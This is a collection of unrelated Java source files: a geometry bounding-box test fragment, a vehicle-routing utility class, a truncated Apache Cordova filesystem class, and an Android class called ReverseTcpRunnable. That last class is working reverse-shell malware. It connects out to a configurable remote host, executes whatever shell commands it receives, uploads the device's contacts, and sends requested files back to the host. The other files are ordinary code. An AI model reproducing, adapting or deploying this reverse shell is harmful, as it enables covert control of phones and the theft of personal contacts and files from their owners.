assertFalse(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
assertEquals(-1.0, b.getLeftLongitude(), 0.000001);
assertEquals(1.0, b.getRightLongitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, 1.0, -1.0);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
//assertEquals(1.0,b.getLeftLongitude(),0.000001);
//assertEquals(-1.0,b.getRightLongitude(),0.000001);
// Check wide variants of rectangle and longitude slice
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -Math.PI + 0.1, Math.PI - 0.1);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
//assertEquals(-Math.PI+0.1,b.getLeftLongitude(),0.000001);
//assertEquals(Math.PI-0.1,b.getRightLongitude(),0.000001);
assertEquals(-Math.PI * 0.25, b.getMinLatitude(), 0.000001);
assertEquals(0.0, b.getMaxLatitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, Math.PI - 0.1, -Math.PI + 0.1);
b = c.getBounds(null);
assertFalse(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
assertEquals(Math.PI - 0.1, b.getLeftLongitude(), 0.000001);
assertEquals(-Math.PI + 0.1, b.getRightLongitude(), 0.000001);
assertEquals(-Math.PI * 0.25, b.getMinLatitude(), 0.000001);
assertEquals(0.0, b.getMaxLatitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI + 0.1, Math.PI - 0.1);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
//assertEquals(-Math.PI+0.1,b.getLeftLongitude(),0.000001);
//assertEquals(Math.PI-0.1,b.getRightLongitude(),0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, Math.PI - 0.1, -Math.PI + 0.1);
b = c.getBounds(null);
assertFalse(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
assertEquals(Math.PI - 0.1, b.getLeftLongitude(), 0.000001);
assertEquals(-Math.PI + 0.1, b.getRightLongitude(), 0.000001);
// Check latitude zone
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 1.0, -1.0, -Math.PI, Math.PI);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
assertEquals(-1.0, b.getMinLatitude(), 0.000001);
assertEquals(1.0, b.getMaxLatitude(), 0.000001);
// Now, combine a few things to test the bounds object
GeoBBox c1;
GeoBBox c2;
c1 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI, 0.0);
c2 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, 0.0, Math.PI);
b = new Bounds();
b = c1.getBounds(b);
b = c2.getBounds(b);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
c1 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI, 0.0);
c2 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, 0.0, Math.PI * 0.5);
b = new Bounds();
b = c1.getBounds(b);
b = c2.getBounds(b);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
//assertEquals(-Math.PI,b.getLeftLongitude(),0.000001);
//assertEquals(Math.PI*0.5,b.getRightLongitude(),0.000001);
c1 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI * 0.5, 0.0);
c2 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, 0.0, Math.PI);
b = new Bounds();
b = c1.getBounds(b);
b = c2.getBounds(b);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
//assertEquals(-Math.PI * 0.5,b.getLeftLongitude(),0.000001);
//assertEquals(Math.PI,b.getRightLongitude(),0.000001);
}
}
|
|
package com.anythingintellect.androidreverseshell;
import android.content.Context;
import android.content.SharedPreferences;
import android.text.TextUtils;
import android.util.Log;
import com.anythingintellect.androidreverseshell.internalcmdutils.ContactHelper;
import com.anythingintellect.androidreverseshell.internalcmdutils.GetHelper;
import com.anythingintellect.androidreverseshell.utils.RSPreferences;
import org.json.JSONArray;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.Socket;
/**
* Created by ishan.dhingra on 21/07/16.
*/
public class ReverseTcpRunnable implements Runnable, SharedPreferences.OnSharedPreferenceChangeListener {
private static final long RETRY_WAIT_TIME = 10000;
String host;
int port;
private String directory = "/";
private static final String CMD_CD = "cd";
private static final String CMD_CONTACT = "contact";
private static final String CMD_GET = "get";
private Context mContext;
private RSPreferences rsPreferences;
public ReverseTcpRunnable(Context context) {
this.mContext = context;
this.rsPreferences = RSPreferences.getInstance(context);
this.host = rsPreferences.getHost();
this.port = rsPreferences.getPort();
rsPreferences.getSharedPreferences().registerOnSharedPreferenceChangeListener(this);
}
@Override
public void run() {
startReverseShell(host, port);
}
private void startReverseShell(String host, int port) {
DataOutputStream toServer = null;
BufferedReader fromServer = null;
log("Connecting to " + host + ":" + port);
boolean run = true;
try {
Socket socket = new Socket(host, port);
log("Connected!");
toServer = new DataOutputStream(socket.getOutputStream());
fromServer = new BufferedReader(
new InputStreamReader(socket.getInputStream()));
// Required to handshake with server
// Can be anything you like
toServer.write("Hello".getBytes("UTF-8"));
while (run) {
String command = fromServer.readLine();
if(TextUtils.isEmpty(command)) {
continue;
}
if (command.equalsIgnoreCase("bye")) {
run = false;
shotResponseLine("bye", toServer);
// Closing socket not required as we are closing stream in finally
continue;
}
doCommand(command.split(" "), toServer);
// Sending line break, giving client a chance for next command
shotEndResponse(toServer);
}
} catch (IOException e) {
e.printStackTrace();
} finally {
try {
if (toServer != null) {
toServer.close();
}
if (fromServer != null) {
fromServer.close();
}
} catch (IOException e) {
e.printStackTrace();
}
if (run) {
retry();
} else {
doCleanup();
}
}
}
private void doCleanup() {
rsPreferences.getSharedPreferences().unregisterOnSharedPreferenceChangeListener(this);
}
private void shotEndResponse(DataOutputStream toServer) {
try {
toServer.flush();
toServer.write("$endRes$".getBytes("UTF-8"));
} catch (IOException e) {
e.printStackTrace();
}
}
private void retry() {
try {
Thread.sleep(RETRY_WAIT_TIME);
} catch (InterruptedException e1) {
e1.printStackTrace();
} finally {
startReverseShell(host, port);
}
}
// Entry point for all type of commands shell and custom
private void doCommand(String[] commands, DataOutputStream toServer) {
if(TextUtils.isEmpty(commands[0])) {
return;
}
// Check if custom command and process
if (tryInternalCommand(commands, toServer)) {
return;
}
// Try Shell commands
commands = decideCommandName(commands);
doShellCommand(commands, toServer);
}
private void shotResponseLine(String response, DataOutputStream toServer) {
try {
log(response);
toServer.write(response.getBytes("UTF-8"));
} catch (IOException e) {
e.printStackTrace();
}
}
private boolean doShellCommand(String[] commands, DataOutputStream toServer) {
// Executing command with specific directory
// directory init is handled by custom command
Process process;
BufferedReader reader = null;
try {
process = Runtime.getRuntime().exec(commands, null, new File(directory));
reader = new BufferedReader(
new InputStreamReader(process.getInputStream()));
String line = "";
while ((line = reader.readLine()) != null) {
shotResponseLine(line + "\n", toServer);
}
process.waitFor();
} catch (IOException e) {
e.printStackTrace();
} catch (InterruptedException e) {
e.printStackTrace();
} finally {
if (reader != null) {
try {
reader.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
return true;
}
private boolean tryInternalCommand(String[] cmd, DataOutputStream toServer) {
switch (cmd[0]) {
case CMD_CD: {
String dir = GetHelper.getDirNameFromCmd(cmd);
if(dir.startsWith("/")) {
directory = dir;
} else {
directory += "/" + dir;
}
String res = "Working directory changed to: "+directory;
shotResponseLine(res, toServer);
return true;
}
case CMD_CONTACT: {
JSONArray contacts = ContactHelper.fetchContact(mContext);
shotResponseLine(contacts.length()+ " Contacts Found!", toServer);
shotResponseArray(contacts, toServer);
return true;
}
case CMD_GET: {
// To be tested
if (cmd.length > 1) {
String filePath = directory + "/" + cmd[1];
File file = new File(filePath);
if (file.exists()) {
try {
Socket dataSock = new Socket(host, port);
InputStream fileStream = new FileInputStream(file);
OutputStream sockStream = dataSock.getOutputStream();
byte[] buffer = new byte[1024];
int count;
while ((count = fileStream.read(buffer))> 0) {
sockStream.write(buffer,0, count);
}
sockStream.close();
fileStream.close();
dataSock.close();
} catch (IOException e) {
e.printStackTrace();
}
}
} else {
shotResponseLine("Specify File Name!", toServer);
}
return true;
}
}
return false;
}
private void shotResponseArray(JSONArray array, DataOutputStream toServer) {
for (int i = 0; i < array.length(); i++) {
JSONObject item = (JSONObject) array.opt(i);
if (item != null) {
shotResponseLine(item.toString()+"\n", toServer);
}
}
}
private String[] decideCommandName(String[] commands) {
String cmd = commands[0];
// Point to bin, where most of the commands are
commands[0] = "/system/bin/" + commands[0];
// Check if in in bin
File cmdFile = new File(commands[0]);
if (!cmdFile.exists()) {
// If not switch to plain command
commands[0] = cmd;
}
return commands;
}
private void log(String msg) {
if (msg != null) {
Log.d("rvtcp", msg);
}
}
@Override
public void onSharedPreferenceChanged(SharedPreferences sharedPreferences, String s) {
String newHost = rsPreferences.getHost();
int newPort = rsPreferences.getPort();
if (!newHost.equalsIgnoreCase(host)) {
this.host = newHost;
}
if (newPort != port) {
this.port = newPort;
}
}
}
|
|
package vrpsim.simulationmodel.dynamicbehaviour.impl.usutil;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class Util {
private static Logger logger = LoggerFactory.getLogger(Util.class);
public static boolean isNull(Map<Integer, OpNode> structure) {
Set<OpNode> handled = new HashSet<>();
OpNode workWith = structure.get(structure.keySet().iterator().next());
int inserted = 0;
while (!handled.contains(workWith)) {
handled.add(workWith);
workWith = workWith.getNext();
if (workWith == null) {
return true;
}
inserted++;
}
return !(inserted == structure.size());
}
public static int adaptIndex(int index, int tourLength) {
int result = index % tourLength;
result = result < 0 ? result + tourLength : result;
return result;
}
// private static String lineBreak = "\n";
private static String lineBreak = "";
public static String toString(Map<Integer, OpNode> structure) {
String result = "" + lineBreak;
for (Integer key : structure.keySet()) {
result += "i(" + key + ")" + structure.get(key).toString() + ")||" + lineBreak;
}
return result + lineBreak;
}
/**
* Generates the {@link OpNode} out of the Integer values. The keys in the
* returned {@link Map} are the original indexes.
*
* @param tour
* @return
*/
public static Map<Integer, OpNode> constrcutOpNodes(Integer[] tour) {
Map<Integer, OpNode> result = new HashMap<>();
// Build middle part.
for (int i = 0; i < tour.length; i++) {
OpNode next = new OpNode(tour[i]);
result.put(i, next);
int pi = (i - 1) % tour.length;
pi = (pi < 0) ? pi + tour.length : pi;
OpNode previous = result.get(pi);
if (previous != null) {
previous.setNext(next);
next.setPrevious(previous);
}
}
// Set next and previous from last and first.
OpNode first = result.get(0);
OpNode last = result.get(tour.length - 1);
last.setNext(first);
first.setPrevious(last);
return result;
}
/**
* Removes the element with the given index from the tour, returns a new tour.
*
* @param tour
* @param toRemoveIndex
* @return
*/
public static Integer[] removeAndCopy(Integer[] tour, int toRemoveIndex) {
Integer[] result = new Integer[tour.length - 1];
System.arraycopy(tour, 0, result, 0, toRemoveIndex);
System.arraycopy(tour, toRemoveIndex + 1, result, toRemoveIndex, tour.length - toRemoveIndex - 1);
return result;
}
/**
* Removes an index out of the rour, returns a copy.
*
* @param tour
* @param indexI
* @return
*/
public static Integer[] remove(Integer[] tour, int indexI) {
Integer[] result = new Integer[tour.length - 1];
int correct = 0;
for (int i = 0; i < tour.length; i++) {
if (i != indexI) {
result[i - correct] = tour[i];
} else {
correct = 1;
}
}
return result;
}
public static double getDistance(Map<Integer, OpNode> structure, IDistanceCalculator distanceCalculator) {
double distance = 0;
Set<OpNode> handled = new HashSet<>();
OpNode workWith = structure.get(structure.keySet().iterator().next());
while (!handled.contains(workWith)) {
distance += distanceCalculator.getDistance(workWith.getValue(), workWith.getNext().getValue());
handled.add(workWith);
workWith = workWith.getNext();
}
return distance;
}
public static Integer[] getTour(Map<Integer, OpNode> tour) {
if (tour == null) {
logger.trace("Can not build Integer[] tour because tour is null");
return null;
}
Integer[] result = new Integer[tour.size()];
Set<OpNode> handled = new HashSet<>();
OpNode workWith = tour.get(tour.keySet().iterator().next());
int insert = 0;
while (!handled.contains(workWith)) {
result[insert++] = workWith.getValue();
handled.add(workWith);
workWith = workWith.getNext();
}
return result;
}
public static TourResult getTour(Map<Integer, OpNode> tour, int startIndex) {
if (tour == null) {
logger.trace("Can not build Integer[] tour because tour is null");
return null;
}
Integer[] result = new Integer[tour.size()];
int inserted = 0;
Set<OpNode> visited = new HashSet<>();
OpNode workWith = tour.get(startIndex);
visited.add(workWith);
result[inserted++] = workWith.getValue();
boolean tourIsValid = true;
while (visited.size() < result.length) {
OpNode newNext = workWith.getNext();
if (newNext != null && !visited.contains(newNext)) {
workWith = newNext;
visited.add(workWith);
result[inserted++] = workWith.getValue();
} else {
OpNode newNextOld = workWith.getNextOld();
if (newNextOld != null && !visited.contains(newNextOld)) {
workWith = newNextOld;
visited.add(workWith);
result[inserted++] = workWith.getValue();
} else {
OpNode previous = workWith.getPrevious();
if (previous != null && !visited.contains(previous)) {
workWith = previous;
visited.add(workWith);
result[inserted++] = workWith.getValue();
} else {
OpNode previousOld = workWith.getPreviousOld();
if (previousOld != null && !visited.contains(previousOld)) {
workWith = previousOld;
visited.add(workWith);
result[inserted++] = workWith.getValue();
} else {
tourIsValid = false;
break;
}
}
}
}
}
return new TourResult(tourIsValid, result);
}
public static class TourResult {
private final boolean validTour;
private final Integer[] tour;
public TourResult(boolean validTour, Integer[] tour) {
super();
this.validTour = validTour;
this.tour = tour;
}
public boolean isValidTour() {
return validTour;
}
public Integer[] getTour() {
return tour;
}
}
/**
* Returns the distance of the tour based on the given distance calculator.
*
* @param tour
* @param distanceCalculator
* @return
*/
public static double getDistance(Integer[] tour, IDistanceCalculator distanceCalculator) {
double cost = 0;
for (int i = 0; i < tour.length; i++) {
int index1 = tour[i];
int index2 = tour[(i + 1) % tour.length];
cost += distanceCalculator.getDistance(index1, index2);
}
return cost;
}
/**
* Reverts the edges between start and end.
*
* @param tour
* @param startRevert
* @param endRevert
*/
public static void revert(Map<Integer, OpNode> tour, int startRevert, int endRevert) {
startRevert = Util.adaptIndex(startRevert, tour.size());
endRevert = Util.adaptIndex(endRevert, tour.size());
OpNode startOpNode = tour.get(startRevert);
OpNode endOpNode = tour.get(endRevert);
if (startRevert == endRevert) {
tour.get(startRevert).revert();
} else {
OpNode toRevert = startOpNode;
while (true) {
OpNode nextToRevert = toRevert.getNext();
toRevert.revert();
toRevert = nextToRevert;
if (toRevert.equals(endOpNode)) {
break;
}
}
endOpNode.revert();
}
}
/**
* Inserts new edges between from and to.
*
* @param structure
* @param from
* @param to
*/
public static void insert(Map<Integer, OpNode> structure, int from, int to) {
from = Util.adaptIndex(from, structure.size());
to = Util.adaptIndex(to, structure.size());
OpNode f = structure.get(from);
OpNode t = structure.get(to);
f.insert(t);
}
/**
* Reverts a part of the tour within the tour. Works and returns a copy.
*
* @param tour
* @param startRevert
* @param endrevert
* @return
*/
public static Integer[] revertAndCopy(Integer[] tour, int startRevert, int endrevert) {
// Correct the indexs
startRevert = startRevert % tour.length;
startRevert = (startRevert < 0) ? startRevert + tour.length : startRevert;
endrevert = endrevert % tour.length;
endrevert = (endrevert < 0) ? endrevert + tour.length : endrevert;
Integer[] result = new Integer[tour.length];
int revertIndex = 0;
for (int i = 0; i < tour.length; i++) {
int value = tour[i];
if (i >= startRevert && i <= endrevert) {
value = endrevert - revertIndex;
revertIndex++;
}
result[i] = value;
}
return result;
}
/**
*
* @param tour
* - Indexes of the points in the Tour.
* @param neighbourhoodFrom
* - Index of the given tour which represents the point which is the
* start point for the neighbourhood
* @param neighbourhoodSize
* - Size of the neighbourhood.
* @param distanceCalculator
* - Calculates the distances between points based on the indexes of
* the points.
* @return a list of indexes from the given tour list which represent the
* neighbourhood
*/
public static int[] getNeighbourhoodIndexesAfterDistance(Integer[] tour, int neighbourhoodFrom, int neighbourhoodSize,
IDistanceCalculator distanceCalculator) {
// Possible to start with negative indexes.
neighbourhoodFrom = neighbourhoodFrom % tour.length;
neighbourhoodFrom = (neighbourhoodFrom < 0) ? neighbourhoodFrom + tour.length : neighbourhoodFrom;
int[] neighbourhood = null;
if (tour.length > neighbourhoodSize) {
neighbourhood = new int[neighbourhoodSize];
int left = 1;
int right = 1;
for (int i = 0; i < neighbourhoodSize; i++) {
int indexLeft = (neighbourhoodFrom - left) % tour.length;
indexLeft = (indexLeft < 0) ? indexLeft + tour.length : indexLeft;
int indexRight = (neighbourhoodFrom + right) % tour.length;
indexRight = (indexRight < 0) ? indexRight + tour.length : indexRight;
// Note: caching from already calculated distances should be done by the
// IDistanceCalculator
double distanceLeft = distanceCalculator.getDistance(tour[neighbourhoodFrom], tour[indexLeft]);
double distanceRight = distanceCalculator.getDistance(tour[neighbourhoodFrom], tour[indexRight]);
if (distanceLeft < distanceRight) {
neighbourhood[i] = indexLeft;
left += 1;
} else {
neighbourhood[i] = indexRight;
right += 1;
}
}
} else {
neighbourhood = new int[tour.length - 1];
int filled = 0;
for (int i = 0; i < tour.length; i++) {
if (i != neighbourhoodFrom) {
neighbourhood[filled++] = tour[i];
}
}
}
return neighbourhood;
}
/**
*
* @param tour
* - Indexes of the points in the Tour.
* @param neighbourhoodFromIndex
* - Index of the given tour which represents the point which is the
* start point for the neighbourhood
* @param neighbourhoodSize
* - Size of the neighbourhood.
* @param distanceCalculator
* - Calculates the distances between points based on the indexes of
* the points.
* @return a list of indexes from the given tour list which represent the
* neighbourhood
*/
public static int[] getNeighbourhoodIndexesFromIndexInTour(Integer[] tour, int neighbourhoodFromIndex, int neighbourhoodSize,
IDistanceCalculator distanceCalculator) {
// Possible to start with negative indexes.
neighbourhoodFromIndex = neighbourhoodFromIndex % tour.length;
neighbourhoodFromIndex = (neighbourhoodFromIndex < 0) ? neighbourhoodFromIndex + tour.length : neighbourhoodFromIndex;
if(neighbourhoodSize >= tour.length) {
int[] result = new int[tour.length-1];
int offset = 0;
for(int i = 0; i < tour.length;i++) {
if(i != neighbourhoodFromIndex) {
result[i - offset] = i;
} else {
offset = 1;
}
}
return result;
}
List<Distance> distances = new ArrayList<>();
for (int i = 0; i < tour.length; i++) {
if (i != neighbourhoodFromIndex) {
double d = distanceCalculator.getDistance(tour[neighbourhoodFromIndex], tour[i]);
distances.add(new Distance(i, d));
}
}
Collections.sort(distances);
int[] neighbourhood = new int[neighbourhoodSize];
for (int i = 0; i < neighbourhoodSize; i++) {
neighbourhood[i] = distances.get(i).index;
}
return neighbourhood;
}
public static int[] getNeighbourhoodIndexesFromValue(Integer[] tour, Integer neighbourhoodFromValue, int neighbourhoodSize,
IDistanceCalculator distanceCalculator) {
if(neighbourhoodSize >= tour.length) {
int[] result = new int[tour.length-1];
int offset = 0;
for(int i = 0; i < tour.length;i++) {
if(tour[i] != neighbourhoodFromValue) {
result[i - offset] = i;
} else {
offset = 1;
}
}
return result;
}
List<Distance> distances = new ArrayList<>();
for (int i = 0; i < tour.length; i++) {
if (tour[i] != neighbourhoodFromValue) {
double d = distanceCalculator.getDistance(tour[i], neighbourhoodFromValue);
distances.add(new Distance(i, d));
}
}
Collections.sort(distances);
int[] neighbourhood = new int[neighbourhoodSize];
for (int i = 0; i < neighbourhoodSize; i++) {
neighbourhood[i] = distances.get(i).index;
}
return neighbourhood;
}
public static class Distance implements Comparable<Distance> {
public int index;
public double distance;
public Distance(int index, double distance) {
super();
this.index = index;
this.distance = distance;
}
@Override
public int compareTo(Distance o) {
return Double.compare(distance, o.distance);
}
}
/**
*
* @param tour
* - Indexes of the points in the Tour.
* @param neighbourhoodFrom
* - Index of the given tour which represents the point which is the
* start point for the neighbourhood
* @param neighbourhoodSize
* - Size of the neighbourhood.
* @param distanceCalculator
* - Calculates the distances between points based on the indexes of
* the points.
* @return a list of indexes from the given tour list which represent the
* neighbourhood
*/
public static int[] getNeighbourhoodIndexesAfterDistanceOnTour(Integer[] tour, int neighbourhoodFrom, int neighbourhoodSize,
IDistanceCalculator distanceCalculator) {
int[] neighbourhood = null;
if (tour.length > neighbourhoodSize) {
neighbourhood = new int[neighbourhoodSize];
int left = 1;
int right = 1;
double allDistanceLeft = 0.0;
double allDistanceRight = 0.0;
for (int i = 0; i < neighbourhoodSize; i++) {
int indexLeft1 = (neighbourhoodFrom - left) % tour.length;
indexLeft1 = (indexLeft1 < 0) ? indexLeft1 + tour.length : indexLeft1;
int indexLeft2 = (indexLeft1 + 1) % tour.length;
int indexRight1 = (neighbourhoodFrom + right) % tour.length;
int indexRight2 = (indexRight1 - 1) % tour.length;
indexRight2 = (indexRight2 < 0) ? indexRight2 + tour.length : indexRight2;
// Note: caching from already calculated distances should be done by the
// IDistanceCalculator
double distanceLeftToPrevious = distanceCalculator.getDistance(tour[indexLeft2], tour[indexLeft1]);
double distanceRightToPrevious = distanceCalculator.getDistance(tour[indexRight2], tour[indexRight1]);
if (distanceLeftToPrevious + allDistanceLeft < distanceRightToPrevious + allDistanceRight) {
neighbourhood[i] = indexLeft1;
left += 1;
allDistanceLeft += distanceLeftToPrevious;
} else {
neighbourhood[i] = indexRight1;
right += 1;
allDistanceRight += distanceRightToPrevious;
}
}
} else {
neighbourhood = new int[tour.length - 1];
int filled = 0;
for (int i = 0; i < tour.length; i++) {
if (i != neighbourhoodFrom) {
neighbourhood[filled++] = tour[i];
}
}
}
return neighbourhood;
}
/**
* Returns the intersection between the two sets.
*
* @param setA
* @param setB
* @return
*/
public static final int[] getIntersection(int[] setA, int[] setB) {
HashSet<Integer> set1 = new HashSet<Integer>();
for (int i : setA) {
set1.add(i);
}
HashSet<Integer> set2 = new HashSet<Integer>();
for (int i : setB) {
if (set1.contains(i)) {
set2.add(i);
}
}
int[] result = new int[set2.size()];
int i = 0;
for (int n : set2) {
result[i++] = n;
}
return result;
}
}
|
|
/*
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
*/
package org.apache.cordova.file;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.InvocationTargetException;
import org.apache.cordova.CordovaInterface;
import org.apache.cordova.CordovaResourceApi;
import org.apache.cordova.CordovaWebView;
import org.apache.cordova.PluginManager;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import android.content.ContentResolver;
import android.database.Cursor;
import android.net.Uri;
import android.provider.MediaStore;
import android.provider.OpenableColumns;
public class ContentFilesystem extends Filesystem {
private CordovaInterface cordova;
private CordovaResourceApi resourceApi;
public ContentFilesystem(CordovaInterface cordova, CordovaWebView webView) {
super(Uri.parse("content://"), "content");
this.cordova = cordova;
Class webViewClass = webView.getClass();
PluginManager pm = null;
try {
Method gpm = webViewClass.getMethod("getPluginManager");
pm = (PluginManager) gpm.invoke(webView);
} catch (NoSuchMethodException e) {
} catch (IllegalAccessException e) {
} catch (InvocationTargetException e) {
}
if (pm == null) {
try {
Field pmf = webViewClass.getField("pluginManager");
pm = (PluginManager)pmf.get(webView);
} catch (NoSuchFieldException e) {
} catch (IllegalAccessException e) {
}
}
this.resourceApi = new CordovaResourceApi(webView.getContext(), pm);
}
@Override
public JSONObject getEntryForLocalURL(LocalFilesystemURL inputURL) throws IOException {
if ("/".equals(inputURL.fullPath)) {
return LocalFilesystem.makeEntryForURL(inputURL, true, inputURL.URL.toString());
}
// Get the cursor to validate that the file exists
Cursor cursor = openCursorForURL(inputURL);
String filePath = null;
try {
if (cursor == null || !cursor.moveToFirst()) {
throw new FileNotFoundException();
}
filePath = filesystemPathForCursor(cursor);
} finally {
if (cursor != null)
cursor.close();
}
if (filePath == null) {
filePath = inputURL.URL.toString();
} else {
filePath = "file://" + filePath;
}
return makeEntryForPath(inputURL.fullPath, inputURL.filesystemName, false /*fp.isDirectory()*/, filePath);
}
@Override
public JSONObject getFileForLocalURL(LocalFilesystemURL inputURL,
String fileName, JSONObject options, boolean directory) throws IOException, TypeMismatchException, JSONException {
if (options != null) {
if (options.optBoolean("create")) {
throw new IOException("Cannot create content url");
}
}
LocalFilesystemURL requestedURL = new LocalFilesystemURL(Uri.withAppendedPath(inputURL.URL, fileName));
File fp = new File(this.filesystemPathForURL(requestedURL));
if (!fp.exists()) {
throw new FileNotFoundException("path does not exist");
}
if (directory) {
if (fp.isFile()) {
throw new TypeMismatchException("path doesn't exist or is file");
}
} else {
if (fp.isDirectory()) {
throw new TypeMismatchException("path doesn't exist or is directory");
}
}
// Return the directory
return makeEntryForPath(requestedURL.fullPath, requestedURL.filesystemName, directory, Uri.fromFile(fp).toString());
}
@Override
public boolean removeFileAtLocalURL(LocalFilesystemURL inputURL)
throws NoModificationAllowedException {
String filePath = filesystemPathForURL(inputURL);
File file = new File(filePath);
try {
this.cordova.getActivity().getContentResolver().delete(MediaStore.Images.Media.EXTERNAL_CONTENT_URI,
MediaStore.Images.Media.DATA + " = ?",
new String[] { filePath });
} catch (UnsupportedOperationException t) {
// Was seeing this on the File mobile-spec tests on 4.0.3 x86 emulator.
// The ContentResolver applies only when the file was registered in the
// first case, which is generally only the case with images.
}
return file.delete();
}
@Override
public boolean recursiveRemoveFileAtLocalURL(LocalFilesystemURL inputURL)
throws NoModificationAllowedException {
throw new NoModificationAllowedException("Cannot remove content url");
}
@Override
public JSONArray readEntriesAtLocalURL(LocalFilesystemURL inputURL)
throws FileNotFoundException {
// TODO Auto-generated method stub
return null;
}
@Override
public JSONObject getFileMetadataForLocalURL(LocalFilesystemURL inputURL) throws FileNotFoundException {
Integer size = null;
Integer lastModified = null;
Cursor cursor = openCursorForURL(inputURL);
try {
if (cursor != null && cursor.moveToFirst()) {
size = resourceSizeForCursor(cursor);
lastModified = lastModifiedDateForCursor(cursor);
} else {
throw new FileNotFoundException();
}
} finally {
if (cursor != null)
cursor.close();
}
JSONObject metadata = new JSONObject();
try {
metadata.put("size", size);
metadata.put("type", resourceApi.getMimeType(inputURL.URL));
metadata.put("name", inputURL.filesystemName);
metadata.put("fullPath", inputURL.fullPath);
metadata.put("lastModifiedDate", lastModified);
} catch (JSONException e) {
return null;
}
return metadata;
}
@Override
public JSONObject copyFileToURL(LocalFilesystemURL destURL, String newName,
Filesystem srcFs, LocalFilesystemURL srcURL, boolean move)
throws IOException, InvalidModificationException, JSONException,
NoModificationAllowedException, FileExistsException {
if (LocalFilesystem.class.isInstance(srcFs)) {
/* Same FS, we can shortcut with CordovaResourceApi operations */
// Figure out where we should be copying to
final LocalFilesystemURL destinationURL = makeDestinationURL(newName, srcURL, destURL);
OutputStream os = resourceApi.openOutputStream(destURL.URL);
CordovaResourceApi.OpenForReadResult ofrr = resourceApi.openForRead(srcURL.URL);
if (move && !srcFs.canRemoveFileAtLocalURL(srcURL)) {
throw new NoModificationAllowedException("Cannot move file at source URL");
}
try {
resourceApi.copyResource(ofrr, os);
} catch (IOException e) {
throw new IOException("Cannot read file at source URL");
}
if (move) {
srcFs.removeFileAtLocalURL(srcURL);
}
return makeEntryForURL(destinationURL, false, destinationURL.URL.toString());
} else {
// Need to copy the hard way
return super.copyFileToURL(destURL, newName, srcFs, srcURL, move);
}
}
@Override
public void readFileAtURL(LocalFilesystemURL inputURL, long start, long end,
ReadFileCallback readFileCallback) throws IOException {
CordovaResourceApi.OpenForReadResult ofrr = resourceApi.openForRead(inputURL.URL);
if (end < 0) {
end = ofrr.length;
}
long numBytesToRead = end - start;
try {
if (start > 0) {
ofrr.inputStream.skip(start);
}
LimitedInputStream inputStream = new LimitedInputStream(ofrr.inputStream, numBytesToRead);
readFileCallback.handleData(inputStream, ofrr.mimeType);
} finally {
ofrr.inputStream.close();
}
}
@Override
public long writeToFileAtURL(LocalFilesystemURL inputURL, String data,
int offset, boolean isBinary) throws NoModificationAllowedException {
throw new NoModificationAllowedException("Couldn't write to file given its content URI");
}
@Override
